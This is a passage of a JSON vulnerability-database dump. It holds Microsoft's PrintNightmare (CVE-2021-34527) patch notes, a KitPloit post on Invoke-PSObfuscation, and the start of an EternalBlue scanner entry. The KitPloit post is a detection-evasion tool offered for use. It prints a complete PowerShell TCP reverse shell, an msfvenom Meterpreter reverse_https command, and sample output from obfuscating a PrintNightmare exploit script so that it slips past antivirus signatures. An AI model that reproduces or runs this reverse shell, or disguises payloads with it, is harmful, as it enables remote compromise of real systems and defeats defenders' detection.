2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the latest SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004955>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004955](<https://download.microsoft.com/download/c/8/8/c88a24bd-9f1c-4cf1-8e26-cb65bd2ef4c7/5004955.csv>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004955 (Monthly Rollup) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004955", "href": "https://support.microsoft.com/en-us/help/5004955", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:38:43", "description": "None\n**Important: **Windows 7 and Windows Server 2008 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 and Windows Server 2008 R2 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see [KB5005010](<https://support.microsoft.com/help/5005010>).\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update or later updates, connections to SQL Server 2005 might fail. You might receive the following error: \n \n\"Cannot connect to <Server name>, Additional information: A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: Named Pipes Provider, error: 40 - Could not open a connection to SQL Server) (.Net SqlClient Data Provider)\"| This is expected behavior due to a security hardening change in this update. To resolve this issue, you will need to update to a [supported version of SQL Server](<https://docs.microsoft.com/en-us/lifecycle/products/?terms=sql%20server>). \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer,\u201d and the update might show as **Failed **in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\n * If you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/obtaining-extended-security-updates-for-eligible-windows-devices/ba-p/1167091>) post. For information on the prerequisites, see the **How to get this update** section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \"STATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\". This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n 4. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the latest SSU ([KB4592510](<https://support.microsoft.com/help/4592510>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5003636](<https://support.microsoft.com/help/5003636>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004951>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004951](<https://download.microsoft.com/download/e/b/5/eb523bca-d712-4df9-991a-c3ba662ee308/5004951.csv>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004951 (Security-only update) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004951", "href": "https://support.microsoft.com/en-us/help/5004951", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2023-05-23T16:23:35", "description": "[![](https://blogger.googleusercontent.com/img/a/AVvXsEhvHxpOWiJ1NSyXmIWJcHIH7haCoxHylKQQ9-j13MtsLdnMdFOU3Mzs_QT7x-7RH3us_9j08DEzdwUUYAPpQnJXC_nUaLHCR2LExWqmgwds-IjoRT4nQX-xhj8cAaFUbvlzvaxpYW509hY4DMGpm0kUk_I1wN8WgTaW6V-Q-mPKVPdUK6tCiLavJcby_w=w640-h338)](<https://blogger.googleusercontent.com/img/a/AVvXsEhvHxpOWiJ1NSyXmIWJcHIH7haCoxHylKQQ9-j13MtsLdnMdFOU3Mzs_QT7x-7RH3us_9j08DEzdwUUYAPpQnJXC_nUaLHCR2LExWqmgwds-IjoRT4nQX-xhj8cAaFUbvlzvaxpYW509hY4DMGpm0kUk_I1wN8WgTaW6V-Q-mPKVPdUK6tCiLavJcby_w>)\n\n \n\n\nTraditional [obfuscation](<https://www.kitploit.com/search/label/Obfuscation> \"obfuscation\" ) [techniques](<https://www.kitploit.com/search/label/Techniques> \"techniques\" ) tend to add layers to encapsulate standing code, such as base64 or compression. These payloads do continue to have a varied degree of success, but they have become trivial to extract the intended payload and some launchers get detected often, which essentially introduces chokepoints.\n\nThe approach this tool introduces is a methodology where you can target and obfuscate the individual components of a script with randomized variations while achieving the same intended logic, without encapsulating the entire payload within a single layer. Due to the complexity of the obfuscation logic, the resulting payloads will be very difficult to signature and will slip past heuristic engines that are not programmed to emulate the inherited logic.\n\nWhile this script can obfuscate most payloads successfully on it's own, this project will also serve as a standing framework that I will to use to produce future functions that will utilize this framework to provide dedicated obfuscated payloads, such as one that only produces reverse shells.\n\nI wrote a blog piece for Offensive Security as a precursor into the techniques this tool introduces. Before venturing further, consider giving it a read first: <https://www.offensive-security.com/offsec/powershell-obfuscation/>\n\n \n\n\n## Dedicated Payloads\n\nAs part of my on going work with [PowerShell](<https://www.kitploit.com/search/label/PowerShell> \"PowerShell\" ) obfuscation, I am building out scripts that produce dedicated payloads that utilize this framework. These have helped to save me time and hope you find them useful as well. You can find them within their own folders at the root of this repository.\n\n 1. Get-ReverseShell\n 2. Get-DownloadCradle\n 3. Get-Shellcode\n\n## Components\n\nLike many other programming languages, PowerShell can be broken down into many different components that make up the executable logic. This allows us to defeat signature-based detections with relative ease by changing how we represent individual components within a payload to a form an obscure or unintelligible derivative.\n\nKeep in mind that targeting every component in complex payloads is very instrusive. This tool is built so that you can target the components you want to obfuscate in a controlled manner. I have found that a lot of signatures can be defeated simply by targeting cmdlets, variables and any comments. When using this against complex payloads, such as print nightmare, keep in mind that custom function parameters / variables will also be changed. Always be sure to properly test any resulting payloads and ensure you are aware of any modified named paramters.\n\nComponent types such as pipes and pipeline variables are introduced here to help make your payload more obscure and harder to decode.\n\n**Supported Types**\n\n * Aliases (iex)\n * Cmdlets (New-Object)\n * Comments (# and <# #>)\n * Integers (4444)\n * Methods ($client.GetStream())\n * Namespace Classes (System.Net.Sockets.TCPClient)\n * Pipes (|)\n * Pipeline Variables ($_)\n * Strings (\"value\" | 'value')\n * Variables ($client)\n\n## Generators\n\nEach component has its own dedicated generator that contains a list of possible static or dynamically generated values that are randomly selected during each execution. If there are multiple instances of a component, then it will iterative each of them individually with a generator. This adds a degree of randomness each time you run this tool against a given payload so each iteration will be different. The only exception to this is variable names.\n\nIf an algorithm related to a specific component starts to cause a payload to flag, the current design allows us to easily modify the logic for that generator without compromising the entire script.\n \n \n $Picker = 1..6 | Get-Random \n Switch ($Picker) { \n 1 { $NewValue = 'Stay' } \n 2 { $NewValue = 'Off' } \n 3 { $NewValue = 'Ronins' } \n 4 { $NewValue = 'Lawn' } \n 5 { $NewValue = 'And' } \n 6 { $NewValue = 'Rocks' } \n }\n\n## Requirements\n\nThis framework and resulting payloads have been tested on the following operating system and PowerShell versions. The resulting [reverse shells](<https://www.kitploit.com/search/label/Reverse%20Shells> \"reverse shells\" ) will not work on PowerShell v2.0\n\nPS Version | OS Tested | Invoke-PSObfucation.ps1 | Reverse Shell \n---|---|---|--- \n7.1.3 | Kali 2021.2 | Supported | Supported \n5.1.19041.1023 | Windows 10 10.0.19042 | Supported | Supported \n5.1.21996.1 | Windows 11 10.0.21996 | Supported | Supported \n \n## Usage Examples\n\n### CVE-2021-34527 (PrintNightmare)\n \n \n \u250c\u2500\u2500(tristram\u327fkali)-[~] \n \u2514\u2500$ pwsh \n PowerShell 7.1.3 \n Copyright (c) Microsoft Corporation. \n \n https://aka.ms/powershell \n Type 'help' to get help. \n \n PS /home/tristram> . ./Invoke-PSObfuscation.ps1 \n PS /home/tristram> Invoke-PSObfuscation -Path .\\CVE-2021-34527.ps1 -Cmdlets -Comments -NamespaceClasses -Variables -OutFile o-printnightmare.ps1 \n \n >> Layer 0 Obfuscation \n >> https://github.com/gh0x0st \n \n [*] Obfuscating namespace classes \n [*] Obfuscating cmdlets \n [*] Obfuscating variables \n [-] -DriverName is now -QhYm48JbCsqF \n [-] -NewUser is now -ybrcKe \n [-] -NewPassword is now -ZCA9QHerOCrEX84gMgNwnAth \n [-] -DLL is now -dNr \n [-] -ModuleName is now -jd \n [-] -Module is now -tu3EI0q1XsGrniAUzx9WkV2o \n [-] -Type is now -fjTOTLDCGufqEu \n [-] -FullName is now -0vEKnCqm \n [-] -EnumElements is now -B9aFqfvDbjtOXPxrR< br/>[-] -Bitfield is now -bFUCG7LB9gq50p4e \n [-] -StructFields is now -xKryDRQnLdjTC8 \n [-] -PackingSize is now -0CB3X \n [-] -ExplicitLayout is now -YegeaeLpPnB \n [*] Removing comments \n [*] Writing payload to o-printnightmare.ps1 \n [*] Done \n \n PS /home/tristram> \n\n### PowerShell Reverse Shell\n \n \n $client = New-Object System.Net.Sockets.TCPClient(\"127.0.0.1\",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\n\nGenerator 2 >> 4444 >> $(0-0+0+0-0-0+0+4444) Generator 1 >> 65535 >> $((65535)) [*] Obfuscating strings Generator 2 >> 127.0.0.1 >> $([char](16*49/16)+[char](109*50/109)+[char](0+55-0)+[char](20*46/20)+[char](0+48-0)+[char](0+46-0)+[char](0+48-0)+[char](0+46-0)+[char](51*49/51)) Generator 2 >> PS >> $([char](1*80/1)+[char](86+83-86)+[char](0+32-0)) Generator 1 >> > >> ([string]::join('', ( (62,32) |%{ ( [char][int] $_)})) | % {$_}) [*] Obfuscating cmdlets Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) Generator 1 >> Out-String >> & ((\"Tpltq1LeZGDhcO4MunzVC5NIP-vfWow6RxXSkbjYAU0aJm3KEgH2sFQr7i8dy9B\")[13,16,3,25,35,3,55,57,17,49] -join '') [*] Writing payload to /home/tristram/obfuscated.ps1 [*] Done\" dir=\"auto\">\n \n \n \u250c\u2500\u2500(tristram\u327fkali)-[~] \n \u2514\u2500$ pwsh \n PowerShell 7.1.3 \n Copyright (c) Microsoft Corporation. \n \n https://aka.ms/powershell \n Type 'help' to get help. \n \n PS /home/tristram> . ./Invoke-PSObfuscation.ps1 \n PS /home/tristram> Invoke-PSObfuscation -Path ./revshell.ps1 -Integers -Cmdlets -Strings -ShowChanges \n \n >> Layer 0 Obfuscation \n >> https://github.com/gh0x0st \n \n [*] Obfuscating integers \n Generator 2 >> 4444 >> $(0-0+0+0-0-0+0+4444) \n Generator 1 >> 65535 >> $((65535)) \n [*] Obfuscating strings \n Generator 2 >> 127.0.0.1 >> $([char](16*49/16)+[char](109*50/109)+[char](0+55-0)+[char](20*46/20)+[char](0+48-0)+[char](0+46-0)+[char](0+48-0)+[char](0+46-0)+[char](51*49/51)) \n Generator 2 >> PS >> $([char](1 *80/1)+[char](86+83-86)+[char](0+32-0)) \n Generator 1 >> > >> ([string]::join('', ( (62,32) |%{ ( [char][int] $_)})) | % {$_}) \n [*] Obfuscating cmdlets \n Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) \n Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) \n Generator 1 >> Out-String >> & ((\"Tpltq1LeZGDhcO4MunzVC5NIP-vfWow6RxXSkbjYAU0aJm3KEgH2sFQr7i8dy9B\")[13,16,3,25,35,3,55,57,17,49] -join '') \n [*] Writing payload to /home/tristram/obfuscated.ps1 \n [*] Done\n\n### Obfuscated PowerShell Reverse Shell\n\n[](<https://github.com/gh0x0st/Invoke-PSObfuscation/blob/main/screenshots/0bFu5c4t3d.jpg> \"An in-depth approach to obfuscating the individual components of a PowerShell payload whether you're on Windows or Kali Linux. \$6\$\" )[![](https://blogger.googleusercontent.com/img/a/AVvXsEhvHxpOWiJ1NSyXmIWJcHIH7haCoxHylKQQ9-j13MtsLdnMdFOU3Mzs_QT7x-7RH3us_9j08DEzdwUUYAPpQnJXC_nUaLHCR2LExWqmgwds-IjoRT4nQX-xhj8cAaFUbvlzvaxpYW509hY4DMGpm0kUk_I1wN8WgTaW6V-Q-mPKVPdUK6tCiLavJcby_w=w640-h338)](<https://blogger.googleusercontent.com/img/a/AVvXsEhvHxpOWiJ1NSyXmIWJcHIH7haCoxHylKQQ9-j13MtsLdnMdFOU3Mzs_QT7x-7RH3us_9j08DEzdwUUYAPpQnJXC_nUaLHCR2LExWqmgwds-IjoRT4nQX-xhj8cAaFUbvlzvaxpYW509hY4DMGpm0kUk_I1wN8WgTaW6V-Q-mPKVPdUK6tCiLavJcby_w>)\n\n### Meterpreter PowerShell Shellcode\n \n \n \u250c\u2500\u2500(tristram\u327fkali)-[~] \n \u2514\u2500$ pwsh \n PowerShell 7.1.3 \n Copyright (c) Microsoft Corporation. \n \n https://aka.ms/powershell \n Type 'help' to get help. \n \n PS /home/kali> msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 EXITFUNC=thread -f ps1 -o meterpreter.ps1 \n [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload \n [-] No arch selected, selecting arch: x86 from the payload \n No encoder specified, outputting raw payload \n Payload size: 686 bytes \n Final size of ps1 file: 3385 bytes \n Saved as: meterpreter.ps1 \n PS /home/kali> . ./Invoke-PSObfuscation.ps1 \n PS /home/kali> Invoke-PSObfuscation -Path ./meterpreter.ps1 -Integers -Variables -OutFile o-meterpreter.ps1 \n \n >> Layer 0 Obfuscation \n >> https://github.com/gh0x0st \n \n [*] Obfuscating integers \n [*] Obfuscating variables \n [*] Writing payload to o-meterpreter.ps1 \n [*] Done\n\n## Comment-Based Help\n \n \n <# \n .SYNOPSIS \n Transforms PowerShell scripts into something obscure, unclear, or unintelligible. \n \n .DESCRIPTION \n Where most obfuscation tools tend to add layers to encapsulate standing code, such as base64 or compression, \n they tend to leave the intended payload intact, which essentially introduces chokepoints. Invoke-PSObfuscation \n focuses on replacing the existing components of your code, or layer 0, with alternative values. \n \n .PARAMETER Path \n A user provided PowerShell payload via a flat file. \n \n .PARAMETER All \n The all switch is used to engage every supported component to obfuscate a given payload. This action is very intrusive \n and could result in your payload being broken. There should be no issues when using this with the vanilla reverse \n shell. However, it's recommended to target specific components with more advanced payloads. Keep in mind that some of \n the generators introduced in this script may even confuse your ISE so be sure to test properly. \n \n .PARAMETER Aliases \n The aliases switch is used to instruct the function to obfuscate aliases. \n \n .PARAMETER Cmdlets \n The cmdlets switch is used to instruct the function to obfuscate cmdlets. \n \n .PARAMETER Comments \n The comments switch is used to instruct the function to remove all comments. \n \n .PARAMETER Integers \n The integers switch is used to instruct the function to obfuscate integers. \n \n .PARAMETER Methods \n The methods switch is used to instruct the function to obfuscate method invocations. \n \n .PARAMETER NamespaceClasses \n The namespaceclasses switch is used to instruct the function to obfuscate namespace classes. \n \n .PARAMETER Pipes \n The pipes switch is used to in struct the function to obfuscate pipes. \n \n .PARAMETER PipelineVariables \n The pipeline variables switch is used to instruct the function to obfuscate pipeline variables. \n \n .PARAMETER ShowChanges \n The ShowChanges switch is used to instruct the script to display the raw and obfuscated values on the screen. \n \n .PARAMETER Strings \n The strings switch is used to instruct the function to obfuscate prompt strings. \n \n .PARAMETER Variables \n The variables switch is used to instruct the function to obfuscate variables. \n \n .EXAMPLE \n PS C:\\> Invoke-PSObfuscation -Path .\\revshell.ps1 -All \n \n .EXAMPLE \n PS C:\\> Invoke-PSObfuscation -Path .\\CVE-2021-34527.ps1 -Cmdlets -Comments -NamespaceClasses -Variables -OutFile o-printernightmare.ps1 \n \n .OUTPUTS \n System.String, System.String \n \n .NOTES \n Additional information abo ut the function. \n #>\n\n \n \n\n\n**[Download Invoke-PSObfuscation](<https://github.com/gh0x0st/Invoke-PSObfuscation> \"Download Invoke-PSObfuscation\" )**\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-21T11:30:00", "type": "kitploit", "title": "Invoke-PSObfuscation - An In-Depth Approach To Obfuscating The Individual Components Of A PowerShell Payload Whether You'Re On Windows Or Kali Linux", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2023-03-21T11:30:00", "id": "KITPLOIT:6049290411707454748", "href": "http://www.kitploit.com/2023/03/invoke-psobfuscation-in-depth-approach.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-19T15:29:53", "description": "[![](https://2.bp.blogspot.com/-ebEXboez-GA/WXJ7VQgyY6I/AAAAAAAAITI/FCM3YSqqjLcm87TdjLvynjO7ZPi69yyHQCLcBGAs/s1600/eternal_scanner_01.png)](<https://2.bp.blogspot.com/-ebEXboez-GA/WXJ7VQgyY6I/AAAAAAAAITI/FCM3YSqqjLcm87TdjLvynjO7ZPi69yyHQCLcBGAs/s1600/eternal_scanner_01.png>)\n\n \nEternal scanner is a network scanner for Eternal Blue exploit CVE-2017-0144. \n \n**Requirements** \n\n\n * masscan\n * metasploit-framework\n \n**How to Install** \n\n\n * git clone <https://github.com/peterpt/eternal_scanner.git>\n * cd eternal_scanner && ./escan\n * OR ./escan -h (to change scanner speed)\n \n**Install Requirements** \n\n\n * apt-get install masscan metasploit-framework\n \n**Screenshots** \n \n\n\n[![](https://2.bp.blogspot.com/-4ZNlV-7ckHs/WXJ7bweYVMI/AAAAAAAAITM/m1JxWOzp-38O2kbC8CarDwDMvuNnmlPQwCLcBGAs/s640/eternal_scanner_02.png)](<https://2.bp.blogspot.com/-4ZNlV-7ckHs/WXJ7bweYVMI/AAAAAAAAITM/m1JxWOzp-38O2kbC8CarDwDMvuNnmlPQwCLcBGAs/s1600/eternal_scanner_02.png>)\n\n \n\n\n[![](https://3.bp.blogspot.com/-TimKnQRCUXo/WXJ7bwGRiAI/AAAAAAAAITQ/2uV5P4byYYkAnQSJNe-DWjNhkj9LnIg8ACLcBGAs/s640/eternal_scanner_03.png)](<https://3.bp.blogspot.com/-TimKnQRCUXo/WXJ7bwGRiAI/AAAAAAAAITQ/2uV5P4byYYkAnQSJNe-DWjNhkj9LnIg8ACLcBGAs/s1600/eternal_scanner_03.png>)\n\n \n\n\n[![](https://4.bp.blogspot.com/-qZ6IfE1iMQ8/WXJ7b7y74FI/AAAAAAAAITU/NMvDIFUu0ToXP6_lDqwMNfrzXwVkqG7SgCLcBGAs/s640/eternal_scanner_04.png)](<https://4.bp.blogspot.com/-qZ6IfE1iMQ8/WXJ7b7y74FI/AAAAAAAAITU/NMvDIFUu0ToXP6_lDqwMNfrzXwVkqG7SgCLcBGAs/s1600/eternal_scanner_04.png>)\n\n \n\n\n[![](https://1.bp.blogspot.com/-prlZCQt8VmM/WXJ7cHR8hBI/AAAAAAAAITY/lYJZHQC3-UYghdHL9UaYTDk2EwVTK-9rwCLcBGAs/s640/eternal_scanner_05.png)](<https://1.bp.blogspot.com/-prlZCQt8VmM/WXJ7cHR8hBI/AAAAAAAAITY/lYJZHQC3-UYghdHL9UaYTDk2EwVTK-9rwCLcBGAs/s1600/eternal_scanner_05.png>)\n\n \n \n**[Download Eternal](<https://github.com/peterpt/eternal_scanner>)**\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-07-22T20:30:00", "type": "kitploit", "title": "Eternal - An internet scanner for Eternal Blue [exploit CVE-2017-0144]", "bulletinFamily": "tools", 